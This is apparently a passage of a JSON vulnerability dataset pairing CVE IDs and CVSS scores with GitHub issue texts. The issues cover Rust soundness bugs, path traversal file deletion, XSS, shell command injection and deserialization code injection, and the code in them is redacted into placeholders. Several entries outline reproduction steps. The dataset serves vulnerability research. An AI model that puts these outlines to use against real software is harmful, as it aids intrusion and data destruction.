  86744. "description": "out_buffer grows until allocation fails. I've been using APITAG in an application which passes images from an embedded device to a webpage, as a simple video streaming solution. On very rare occasions, the system suffers from memory exhaustion, prints something like APITAG and crashes. I've managed to trigger this situation and catch it in the debugger. The issue appears to be APITAG growing without bounds. Here's a full backtrace: ERRORTAG I tried to limit the size of APITAG by configuring APITAG in the Builder settings. The debugger confirms that these settings have been applied. However, APITAG has still grown to a much larger size than expected: ERRORTAG Specifically, APITAG is much larger than the fixed capacity of APITAG . Digging into the source, it seems like the only place this buffer is touched is APITAG URLTAG . Do you have any ideas why the buffer could be growing large enough to trigger allocation failures?",
  86745. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86746. "severity": "HIGH",
  86747. "baseScore": 7.5,
  86748. "impactScore": 3.6,
  86749. "exploitabilityScore": 3.9
  86750. },
  86751. {
  86752. "CVE_ID": "CVE-2020-36446",
  86753. "Issue_Url_old": "https://github.com/kitsuneninetails/signal-rust/issues/2",
  86754. "Issue_Url_new": "https://github.com/kitsuneninetails/signal-rust/issues/2",
  86755. "Repo_new": "kitsuneninetails/signal-rust",
  86756. "Issue_Created_At": "2020-11-15T08:59:37Z",
  86757. "description": "APITAG should have a bound on T: Send. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements Send and Sync unconiditionally: URLTAG However, this should probably be bounded by T: Send in both, otherwise it allows sending types that should never be sent across threads such as Rc or references to cells. You can see an example of such a data race with cells below: ERRORTAG which outputs: APITAG",
  86758. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86759. "severity": "HIGH",
  86760. "baseScore": 8.1,
  86761. "impactScore": 5.9,
  86762. "exploitabilityScore": 2.2
  86763. },
  86764. {
  86765. "CVE_ID": "CVE-2021-38191",
  86766. "Issue_Url_old": "https://github.com/tokio-rs/tokio/issues/3929",
  86767. "Issue_Url_new": "https://github.com/tokio-rs/tokio/issues/3929",
  86768. "Repo_new": "tokio-rs/tokio",
  86769. "Issue_Created_At": "2021-07-06T09:45:58Z",
  86770. "description": "Task dropped in wrong thread when aborting APITAG task. When aborting a task with APITAG , the future is dropped in the thread calling abort if the task is not currently being executed. This is incorrect for tasks spawned on a APITAG . See this example that exploits it to send a non send value to a different thread: CODETAG",
  86771. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86772. "severity": "MEDIUM",
  86773. "baseScore": 5.9,
  86774. "impactScore": 3.6,
  86775. "exploitabilityScore": 2.2
  86776. },
  86777. {
  86778. "CVE_ID": "CVE-2020-36449",
  86779. "Issue_Url_old": "https://github.com/motoras/kekbit/issues/34",
  86780. "Issue_Url_new": "https://github.com/motoras/kekbit/issues/34",
  86781. "Repo_new": "motoras/kekbit",
  86782. "Issue_Created_At": "2020-12-18T22:53:51Z",
  86783. "description": "APITAG allows sending non Send type across threads. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG implements Send trait regardless of the inner type parameter H . This definition allows safe Rust code to send non Send type across threads, which potentially causes a data race or undefined behavior. APITAG trait bound should probably be added to APITAG 's Send implementation. If all handlers are expected to be Send , then Send bound can be added to Handler trait's definition instead. Reproduction Below is an example program that shows non Send type can be sent across threads using safe APIs of kekbit . APITAG Detail APITAG APITAG ERRORTAG Output: ERRORTAG Tested Environment Crate: kekbit Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rustc version: rustc NUMBERTAG eac NUMBERTAG abb NUMBERTAG rd party dependencies: APITAG APITAG APITAG",
  86784. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86785. "severity": "HIGH",
  86786. "baseScore": 8.1,
  86787. "impactScore": 5.9,
  86788. "exploitabilityScore": 2.2
  86789. },
  86790. {
  86791. "CVE_ID": "CVE-2019-25004",
  86792. "Issue_Url_old": "https://github.com/google/flatbuffers/issues/5530",
  86793. "Issue_Url_new": "https://github.com/google/flatbuffers/issues/5530",
  86794. "Repo_new": "google/flatbuffers",
  86795. "Issue_Created_At": "2019-09-24T20:49:59Z",
  86796. "description": "Rust] impl Follow for bool is unsound. The implementation impl Follow for bool is defined [here URLTAG and ends up calling APITAG . APITAG is for all intents and purposes a transmute and therefore given a byte that is not exactly APITAG or APITAG will produce a value of bool that has an invalid underlying bit pattern. That is UB in Rust. Invoking it is as easy as APITAG or something along the lines.",
  86797. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86798. "severity": "CRITICAL",
  86799. "baseScore": 9.8,
  86800. "impactScore": 5.9,
  86801. "exploitabilityScore": 3.9
  86802. },
  86803. {
  86804. "CVE_ID": "CVE-2020-36216",
  86805. "Issue_Url_old": "https://github.com/petabi/eventio/issues/33",
  86806. "Issue_Url_new": "https://github.com/petabi/eventio/issues/33",
  86807. "Repo_new": "petabi/eventio",
  86808. "Issue_Created_At": "2020-12-20T05:50:21Z",
  86809. "description": "Soundness issue: Input APITAG can be misused to create data race to an object. Hello :crab: , we APITAG group APITAG gatech) found a soundness issue in this crate while scanning Rust code on APITAG for potential vulnerabilities. Soundness Issue Send is unconditionally implemented for APITAG , so that it is possible to send APITAG to other threads even when R is not Send . ERRORTAG When APITAG is misused, it is possible to create a data race to a non Sync object. Proof of Concept The example below program creates a data race to a Cell using APITAG modified from URLTAG Multiple threads concurrently update the same Cell that counts the number of read events, making the Cell to contain incorrect statistics. APITAG compares the value contained inside Cell with the exact number of read s that happened. APITAG is a Read object that contains a non Send object ( APITAG ) Program output is shown after the program below ERRORTAG Program output When compiled with APITAG & run on APITAG , outputs from NUMBERTAG executions of the program was as below. CODETAG Suggested Solution Simply adding trait bound APITAG to the Send impl for APITAG will allow the compiler to revoke programs like the above. After the change, APITAG can no longer carry non Send objects when moving across thread boundaries. ERRORTAG Thank you for very much for checking out this issue NUMBERTAG",
  86810. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86811. "severity": "MEDIUM",
  86812. "baseScore": 5.9,
  86813. "impactScore": 3.6,
  86814. "exploitabilityScore": 2.2
  86815. },
  86816. {
  86817. "CVE_ID": "CVE-2019-15546",
  86818. "Issue_Url_old": "https://github.com/ihalila/pancurses/issues/66",
  86819. "Issue_Url_new": "https://github.com/ihalila/pancurses/issues/66",
  86820. "Repo_new": "ihalila/pancurses",
  86821. "Issue_Created_At": "2019-06-09T06:59:02Z",
  86822. "description": "mvprintw and printw should not be exposed. These take format strings, and are trivial to cause memory safety issues which an attacker can exploit with URLTAG If you must expose them, they need to be marked as ERRORTAG .",
  86823. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  86824. "severity": "HIGH",
  86825. "baseScore": 7.5,
  86826. "impactScore": 3.6,
  86827. "exploitabilityScore": 3.9
  86828. },
  86829. {
  86830. "CVE_ID": "CVE-2020-35922",
  86831. "Issue_Url_old": "https://github.com/tokio-rs/mio/issues/1386",
  86832. "Issue_Url_new": "https://github.com/tokio-rs/mio/issues/1386",
  86833. "Repo_new": "tokio-rs/mio",
  86834. "Issue_Created_At": "2020-11-02T09:39:03Z",
  86835. "description": "APITAG assumes the layout of APITAG matches libc::sockaddr. MENTIONTAG noted this in URLTAG URLTAG As far as I can tell there are no guarantees from std about the layout of APITAG , and this code could silently compile and cause UB elsewhere if the representation changes (e.g. if padding is added early on in the struct, resulting in C code reading uninitialized bytes).",
  86836. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86837. "severity": "MEDIUM",
  86838. "baseScore": 5.5,
  86839. "impactScore": 3.6,
  86840. "exploitabilityScore": 1.8
  86841. },
  86842. {
  86843. "CVE_ID": "CVE-2019-16881",
  86844. "Issue_Url_old": "https://github.com/mvdnes/portaudio-rs/issues/20",
  86845. "Issue_Url_new": "https://github.com/mvdnes/portaudio-rs/issues/20",
  86846. "Repo_new": "mvdnes/portaudio-rs",
  86847. "Issue_Created_At": "2019-09-13T16:53:01Z",
  86848. "description": "Stream callback procedure is not unwind safe. It is observed that the APITAG and APITAG functions are not unwind safe, as their definitions shown below. ERRORTAG If the user provided closure could possibly panic, the APITAG of boxed APITAG would not be reachable, which causes its memory to be deallocated, thus resulting in an use after free . Since the APITAG contains two function pointers which might be executed later on, it is obvious that an arbitrary code execution can be constructed maliciously by this way. Therefore, this is highly vulnerable and should be fixed.",
  86849. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86850. "severity": "CRITICAL",
  86851. "baseScore": 9.8,
  86852. "impactScore": 5.9,
  86853. "exploitabilityScore": 3.9
  86854. },
  86855. {
  86856. "CVE_ID": "CVE-2020-35903",
  86857. "Issue_Url_old": "https://github.com/elrnv/dync/issues/4",
  86858. "Issue_Url_new": "https://github.com/elrnv/dync/issues/4",
  86859. "Repo_new": "elrnv/dync",
  86860. "Issue_Created_At": "2020-09-27T18:47:27Z",
  86861. "description": "APITAG allows for misaligned access. Hey there, I noticed that in APITAG the backing storage for the Vec is a APITAG . URLTAG I believe this let's you trigger undefined behavior in the form of misaligned memory access through safe rust code by instantiating a APITAG with a type that has different alignment requirements from APITAG . Running the following program under miri URLTAG : ERRORTAG results in: ERRORTAG",
  86862. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86863. "severity": "MEDIUM",
  86864. "baseScore": 5.5,
  86865. "impactScore": 3.6,
  86866. "exploitabilityScore": 1.8
  86867. },
  86868. {
  86869. "CVE_ID": "CVE-2020-36452",
  86870. "Issue_Url_old": "https://github.com/L117/array-tools/issues/2",
  86871. "Issue_Url_new": "https://github.com/l117/array-tools/issues/2",
  86872. "Repo_new": "L117/array-tools",
  86873. "Issue_Created_At": "2021-01-01T00:51:21Z",
  86874. "description": "APITAG can cause dropping uninitialized memory. Hello \ud83e\udd80 , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG If the APITAG (user supplied APITAG ) panics within APITAG , then APITAG with its uninitialized APITAG is dropped. The Drop impl of APITAG assumes that APITAG is a properly initialized array, and thus APITAG can be invoked on an uninitialized memory blob. Thank you for checking out this issue NUMBERTAG",
  86875. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86876. "severity": "CRITICAL",
  86877. "baseScore": 9.8,
  86878. "impactScore": 5.9,
  86879. "exploitabilityScore": 3.9
  86880. },
  86881. {
  86882. "CVE_ID": "CVE-2020-36448",
  86883. "Issue_Url_old": "https://github.com/krl/cache/issues/1",
  86884. "Issue_Url_new": "https://github.com/krl/cache/issues/1",
  86885. "Repo_new": "krl/cache",
  86886. "Issue_Created_At": "2020-11-24T18:56:44Z",
  86887. "description": "Cache's Send trait and Sync trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the Cache object implements the Send and Sync traits for all types: URLTAG However, this should also probably be bounded by K: Send and K: Sync. Otherwise, it's possible to smuggle non Send types across thread boundaries or share non Sync types across thread boundaries. Here's an example of a data race in safe Rust code through a Cache. ERRORTAG",
  86888. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86889. "severity": "HIGH",
  86890. "baseScore": 8.1,
  86891. "impactScore": 5.9,
  86892. "exploitabilityScore": 2.2
  86893. },
  86894. {
  86895. "CVE_ID": "CVE-2020-35919",
  86896. "Issue_Url_old": "https://github.com/deprecrated/net2-rs/issues/105",
  86897. "Issue_Url_new": "https://github.com/deprecrated/net2-rs/issues/105",
  86898. "Repo_new": "deprecrated/net2-rs",
  86899. "Issue_Created_At": "2020-11-07T13:33:08Z",
  86900. "description": "net2 assumes the layout of APITAG matches libc::sockaddr. The problem code is here: URLTAG It assumes that the layout of APITAG matches APITAG , but this can't be assumed. Related issues: URLTAG URLTAG URLTAG Mio has roughly the same code, this was fixed in URLTAG for socket2: URLTAG",
  86901. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86902. "severity": "MEDIUM",
  86903. "baseScore": 5.5,
  86904. "impactScore": 3.6,
  86905. "exploitabilityScore": 1.8
  86906. },
  86907. {
  86908. "CVE_ID": "CVE-2020-36438",
  86909. "Issue_Url_old": "https://github.com/KizzyCode/tiny_future/issues/1",
  86910. "Issue_Url_new": "https://github.com/kizzycode/tiny_future-rust/issues/1",
  86911. "Repo_new": "kizzycode/tiny_future-rust",
  86912. "Issue_Created_At": "2020-12-08T05:17:36Z",
  86913. "description": "Send and Sync traits for Future should be bound by APITAG . Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that tiny_future implements Send and Sync for all types: URLTAG This should probably be bound by APITAG , otherwise this allows non Send types such as Rc to be sent across thread boundaries which might invoke undefined behavior. Here's an example of this in action with an Rc segfaulting safe Rust code: ERRORTAG Output: APITAG",
  86914. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86915. "severity": "HIGH",
  86916. "baseScore": 8.1,
  86917. "impactScore": 5.9,
  86918. "exploitabilityScore": 2.2
  86919. },
  86920. {
  86921. "CVE_ID": "CVE-2021-26307",
  86922. "Issue_Url_old": "https://github.com/gz/rust-cpuid/issues/40",
  86923. "Issue_Url_new": "https://github.com/gz/rust-cpuid/issues/40",
  86924. "Repo_new": "gz/rust-cpuid",
  86925. "Issue_Created_At": "2021-01-17T16:49:24Z",
  86926. "description": "Incorrect (and probably unsound) transmutes. The code contains several transmutes similar to this: ERRORTAG Reading about FILETAG , this is not correct, because the Rust compiler is free to reorder the fields of the struct. It is also probably unsound, because the Rust compiler is free to add padding. Adding APITAG may be a fix. However I am not sure what role endianness plays here (same question as NUMBERTAG",
  86927. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86928. "severity": "MEDIUM",
  86929. "baseScore": 5.5,
  86930. "impactScore": 3.6,
  86931. "exploitabilityScore": 1.8
  86932. },
  86933. {
  86934. "CVE_ID": "CVE-2021-45708",
  86935. "Issue_Url_old": "https://github.com/TimelyDataflow/abomonation/issues/23",
  86936. "Issue_Url_new": "https://github.com/timelydataflow/abomonation/issues/23",
  86937. "Repo_new": "timelydataflow/abomonation",
  86938. "Issue_Created_At": "2019-09-19T17:22:07Z",
  86939. "description": "Can the pointer alignment situation be improved?. As the docs say, abomonation currently doesn't guarantee correct pointer alignment. This is pretty dangerous, even on NUMBERTAG as rustc might be tempted to generate those evil SIMD instructions that assume the data is aligned and raise an exception otherwise someday. I wonder if there is an API tweak we could use to improve upon this situation?",
  86940. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86941. "severity": "HIGH",
  86942. "baseScore": 7.5,
  86943. "impactScore": 3.6,
  86944. "exploitabilityScore": 3.9
  86945. },
  86946. {
  86947. "CVE_ID": "CVE-2021-26601",
  86948. "Issue_Url_old": "https://github.com/ImpressCMS/impresscms/issues/914",
  86949. "Issue_Url_new": "https://github.com/impresscms/impresscms/issues/914",
  86950. "Repo_new": "impresscms/impresscms",
  86951. "Issue_Created_At": "2021-02-02T21:54:17Z",
  86952. "description": "Arbitrary File Deletion via Path Traversal in FILETAG . Link : URLTAG Date NUMBERTAG UTC By : egix Weakness : Path Traversal Details : Summary: The vulnerability is located in the APITAG script: ERRORTAG User input passed through the \"image_temp\" parameter is not properly sanitized before being used in a call to the ERRORTAG function at lines NUMBERTAG and NUMBERTAG This can be exploited to carry out Path Traversal attacks and delete arbitrary files in the context of the web server process. NOTE : before being deleted, the file will be copied into the APITAG directory. As such, by firstly deleting the APITAG file in that directory, it might be possible to disclose the content of arbitrary files in case the web server allows for directory listing. APITAG branch : The vulnerability has been tested and confirmed on APITAG version NUMBERTAG the latest at the time of writing). Steps To Reproduce NUMBERTAG Login into the application as any user (this should work both for Webmasters and Registered Users NUMBERTAG Go to: APITAG NUMBERTAG The APITAG script will be deleted, rendering the website unusable Impact This vulnerability might allow authenticated attackers to delete arbitrary files, potentially leading to a Denial of Service APITAG condition or destruction of users data.",
  86953. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
  86954. "severity": "HIGH",
  86955. "baseScore": 8.1,
  86956. "impactScore": 5.2,
  86957. "exploitabilityScore": 2.8
  86958. },
  86959. {
  86960. "CVE_ID": "CVE-2019-15602",
  86961. "Issue_Url_old": "https://github.com/itworkcenter/fileview/issues/1",
  86962. "Issue_Url_new": "https://github.com/itworkcenter/fileview/issues/1",
  86963. "Repo_new": "itworkcenter/fileview",
  86964. "Issue_Created_At": "2019-07-09T20:53:59Z",
  86965. "description": "Security Issue. I'm a member of the FILETAG Foundation Security Working Group and we received a report of a vulnerability in this module. We tried inviting the author by e mail but received no response so I'm opening this issue and inviting anyone with commit and npm publish rights to collaborate with us on a fix.",
  86966. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  86967. "severity": "MEDIUM",
  86968. "baseScore": 6.1,
  86969. "impactScore": 2.7,
  86970. "exploitabilityScore": 2.8
  86971. },
  86972. {
  86973. "CVE_ID": "CVE-2019-19919",
  86974. "Issue_Url_old": "https://github.com/wycats/handlebars.js/issues/1558",
  86975. "Issue_Url_new": "https://github.com/handlebars-lang/handlebars.js/issues/1558",
  86976. "Repo_new": "handlebars-lang/handlebars.js",
  86977. "Issue_Created_At": "2019-09-21T13:43:28Z",
  86978. "description": "Disallow calling APITAG and APITAG directly. The recent remote code execution exploits where misusing the helper APITAG in order to call methods from object prototypes that actually should not have been called. The helpers APITAG and APITAG are not meant to be called directly.",
  86979. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86980. "severity": "CRITICAL",
  86981. "baseScore": 9.8,
  86982. "impactScore": 5.9,
  86983. "exploitabilityScore": 3.9
  86984. },
  86985. {
  86986. "CVE_ID": "CVE-2015-8857",
  86987. "Issue_Url_old": "https://github.com/mishoo/UglifyJS2/issues/751",
  86988. "Issue_Url_new": "https://github.com/mishoo/uglifyjs/issues/751",
  86989. "Repo_new": "mishoo/uglifyjs",
  86990. "Issue_Created_At": "2015-07-21T22:25:26Z",
  86991. "description": "uglify c changes behavior of mdast code. I've created a repo to reproduce this bug: URLTAG For the mdast URLTAG markdown library, the source succeeds when not uglified, and then, passed through APITAG , its behavior changes and it breaks. I'm trying to dig through the source, passed through APITAG and then APITAG , in order to track down the cause. It's quite a doozy",
  86992. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86993. "severity": "CRITICAL",
  86994. "baseScore": 9.8,
  86995. "impactScore": 5.9,
  86996. "exploitabilityScore": 3.9
  86997. },
  86998. {
  86999. "CVE_ID": "CVE-2019-5786",
  87000. "Issue_Url_old": "https://github.com/GoogleChrome/puppeteer/issues/4141",
  87001. "Issue_Url_new": "https://github.com/puppeteer/puppeteer/issues/4141",
  87002. "Repo_new": "puppeteer/puppeteer",
  87003. "Issue_Created_At": "2019-03-08T20:06:56Z",
  87004. "description": "CVETAG . Just wanted to quickly verify if master || APITAG has a patch for this vulnerability since all external docs point to a major version that's not where pptr is at. Since I'm not familiar with how changes are backported/forward ported, and most folks here probably aren't as well, it'd be great to get a sense of if pptr is effected. Thanks!",
  87005. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  87006. "severity": "MEDIUM",
  87007. "baseScore": 6.5,
  87008. "impactScore": 3.6,
  87009. "exploitabilityScore": 2.8
  87010. },
  87011. {
  87012. "CVE_ID": "CVE-2015-8856",
  87013. "Issue_Url_old": "https://github.com/expressjs/serve-index/issues/28",
  87014. "Issue_Url_new": "https://github.com/expressjs/serve-index/issues/28",
  87015. "Repo_new": "expressjs/serve-index",
  87016. "Issue_Created_At": "2015-03-14T01:21:57Z",
  87017. "description": "XSS via filename. serve index directory listings are vulnerable to XSS via arbitrary uploader controlled filenames. Repro steps NUMBERTAG Run URLTAG NUMBERTAG APITAG NUMBERTAG ERRORTAG NUMBERTAG Load the serve index server in Chrome NUMBERTAG see an alert box I spotted this when testing webpack dev server, which is also vulnerable as it uses serve index.",
  87018. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  87019. "severity": "MEDIUM",
  87020. "baseScore": 6.1,
  87021. "impactScore": 2.7,
  87022. "exploitabilityScore": 2.8
  87023. },
  87024. {
  87025. "CVE_ID": "CVE-2020-7691",
  87026. "Issue_Url_old": "https://github.com/MrRio/jsPDF/issues/2971",
  87027. "Issue_Url_new": "https://github.com/parallax/jspdf/issues/2971",
  87028. "Repo_new": "parallax/jspdf",
  87029. "Issue_Created_At": "2020-10-20T19:40:50Z",
  87030. "description": "Address CVETAG ( very similar to CVETAG ). Hello! This vulnerability is very similar to NUMBERTAG so I think it should be already fixed. The fact is that gemnasium that is dependency scanner is warning about this issue: + + + | Severity | Medium | | Identifier | CVETAG | | URL | URLTAG | | Scanner | gemnasium | | Message | Cross site Scripting in jspdf | | Package | jspdf NUMBERTAG Solution | Unfortunately, there is no solution available yet. | | Path | | | File | APITAG | + + + And it is very similar to the one that was solved in the mentioned issue, so I don't know if there is something needed to do. I did a test and it is working well FILETAG If you could do a quick check I will appreciate it. Thank you!",
  87031. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  87032. "severity": "MEDIUM",
  87033. "baseScore": 6.1,
  87034. "impactScore": 2.7,
  87035. "exploitabilityScore": 2.8
  87036. },
  87037. {
  87038. "CVE_ID": "CVE-2016-5682",
  87039. "Issue_Url_old": "https://github.com/swagger-api/swagger-ui/issues/1865",
  87040. "Issue_Url_new": "https://github.com/swagger-api/swagger-ui/issues/1865",
  87041. "Repo_new": "swagger-api/swagger-ui",
  87042. "Issue_Created_At": "2016-01-13T04:45:25Z",
  87043. "description": "Property names are not escaped and allow XSS. To reproduce, point swagger ui at a JSON schema file that uses a model with a property containing \" APITAG alert NUMBERTAG APITAG \". The script will execute. I've attached a sinatra server that demonstrates the issue by replacing the APITAG property with APITAG APITAG : URLTAG",
  87044. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  87045. "severity": "MEDIUM",
  87046. "baseScore": 6.1,
  87047. "impactScore": 2.7,
  87048. "exploitabilityScore": 2.8
  87049. },
  87050. {
  87051. "CVE_ID": "CVE-2017-5941",
  87052. "Issue_Url_old": "https://github.com/luin/serialize/issues/4",
  87053. "Issue_Url_new": "https://github.com/luin/serialize/issues/4",
  87054. "Repo_new": "luin/serialize",
  87055. "Issue_Created_At": "2017-02-09T08:09:14Z",
  87056. "description": "APITAG can be abused to achieve arbitrary code injection with an IIFE. ERRORTAG I don't know if this is a functionality as you are using APITAG internally, but the module should not execute code on deserialization.",
  87057. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  87058. "severity": "CRITICAL",
  87059. "baseScore": 9.8,
  87060. "impactScore": 5.9,
  87061. "exploitabilityScore": 3.9
  87062. },
  87063. {
  87064. "CVE_ID": "CVE-2020-8268",
  87065. "Issue_Url_old": "https://github.com/sonnyp/JSON8/issues/113",
  87066. "Issue_Url_new": "https://github.com/sonnyp/json8/issues/113",
  87067. "Repo_new": "sonnyp/json8",
  87068. "Issue_Created_At": "2020-09-12T11:51:50Z",
  87069. "description": "Prototype Pollution Vulnerability in \"json8 merge patch\". Prototype Pollution This package fails to restrict access to prototypes of objects, allowing for modification of prototype behavior, which may allow obtaining sensitive PATHTAG If required I can submit a POC through a secured channel. Thanks.",
  87070. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  87071. "severity": "HIGH",
  87072. "baseScore": 7.5,
  87073. "impactScore": 3.6,
  87074. "exploitabilityScore": 3.9
  87075. },
  87076. {
  87077. "CVE_ID": "CVE-2021-23732",
  87078. "Issue_Url_old": "https://github.com/Quobject/docker-cli-js/issues/22",
  87079. "Issue_Url_new": "https://github.com/quobject/docker-cli-js/issues/22",
  87080. "Repo_new": "quobject/docker-cli-js",
  87081. "Issue_Created_At": "2021-11-11T20:38:01Z",
  87082. "description": "Document lack of sanitization. This code appears to use child processes but doesn't sanitize the input. A project I was working on used this code for something like the following to run something in a container of the user's choosing: APITAG If the user just entered a semicolon after the container name, they could easily inject/run arbitrary commands on the host machine. It's easy enough to only allow valid container names and nothing more in this instance, but the problem was not knowing that there was no sanitization being done behind the scenes. A more ambitious goal might be to make sure no malicious user input can get through, but until that's implemented there should at least be a note in the documentation about it.",
  87083. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
  87084. "severity": "CRITICAL",
  87085. "baseScore": 9.0,
  87086. "impactScore": 6.0,
  87087. "exploitabilityScore": 2.2
  87088. },
  87089. {
  87090. "CVE_ID": "CVE-2018-16472",
  87091. "Issue_Url_old": "https://github.com/ashaffer/cached-path-relative/issues/3",
  87092. "Issue_Url_new": "https://github.com/ashaffer/cached-path-relative/issues/3",
  87093. "Repo_new": "ashaffer/cached-path-relative",
  87094. "Issue_Created_At": "2018-09-07T07:05:45Z",
  87095. "description": "Security issue. Hello, As a member of the\u00a0 FILETAG Security WG URLTAG I would like to draw your attention to a security report that has been made regarding this package. I have made attempts to contact the person identified as a maintainer of this package but did not get any answer. What is the best way to reach someone with commit rights over this repo and hopefully npm publishing rights as well, in order to invite them to privately discuss the issue on the APITAG platform and provide a resolution? Thanks, Liran References: FILETAG \u00a0",
  87096. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87097. "severity": "HIGH",
  87098. "baseScore": 7.5,
  87099. "impactScore": 3.6,
  87100. "exploitabilityScore": 3.9
  87101. },
  87102. {
  87103. "CVE_ID": "CVE-2019-15138",
  87104. "Issue_Url_old": "https://github.com/marcbachmann/node-html-pdf/issues/530",
  87105. "Issue_Url_new": "https://github.com/marcbachmann/node-html-pdf/issues/530",
  87106. "Repo_new": "marcbachmann/node-html-pdf",
  87107. "Issue_Created_At": "2019-09-18T21:37:31Z",
  87108. "description": "npm audit vulnerability . Hey there, an npm advisory is out for this package. URLTAG Is there any timeline to resolve this?",
  87109. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87110. "severity": "HIGH",
  87111. "baseScore": 7.5,
  87112. "impactScore": 3.6,
  87113. "exploitabilityScore": 3.9
  87114. },
  87115. {
  87116. "CVE_ID": "CVE-2019-13118",
  87117. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1943",
  87118. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1943",
  87119. "Repo_new": "sparklemotion/nokogiri",
  87120. "Issue_Created_At": "2019-11-17T17:57:50Z",
  87121. "description": "Investigate libxslt vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html",
  87122. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  87123. "severity": "HIGH",
  87124. "baseScore": 7.5,
  87125. "impactScore": 3.6,
  87126. "exploitabilityScore": 3.9
  87127. },
  87128. {
  87129. "CVE_ID": "CVE-2020-7595",
  87130. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/1992",
  87131. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/1992",
  87132. "Repo_new": "sparklemotion/nokogiri",
  87133. "Issue_Created_At": "2020-02-10T15:42:05Z",
  87134. "description": "Investigate libxml2 vulnerabilities patched in USN NUMBERTAG This issue is to drive investigation and potential action around a set of upstream patches that Canonical judged valuable enough to port to their distributions. References: URLTAG FILETAG PATHTAG CVETAG .html FILETAG PATHTAG CVETAG .html Summary To be filed in as investigation proceeds History of this notification NUMBERTAG USN NUMBERTAG published by Canonical NUMBERTAG this github issue created",
  87135. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  87136. "severity": "HIGH",
  87137. "baseScore": 7.5,
  87138. "impactScore": 3.6,
  87139. "exploitabilityScore": 3.9
  87140. },
  87141. {
  87142. "CVE_ID": "CVE-2021-3517",
  87143. "Issue_Url_old": "https://github.com/sparklemotion/nokogiri/issues/2233",
  87144. "Issue_Url_new": "https://github.com/sparklemotion/nokogiri/issues/2233",
  87145. "Repo_new": "sparklemotion/nokogiri",
  87146. "Issue_Created_At": "2021-05-13T16:59:41Z",
  87147. "description": "Upgrade packaged libxml2 to NUMBERTAG libxml NUMBERTAG was released today NUMBERTAG Let's plan on upgrading to it for the next release. [ ] update APITAG [ ] remove patches that are no longer needed, ensure remaining patches apply cleanly [ ] get all the tests green, particularly under valgrind",
  87148. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
  87149. "severity": "HIGH",
  87150. "baseScore": 8.6,
  87151. "impactScore": 4.7,
  87152. "exploitabilityScore": 3.9
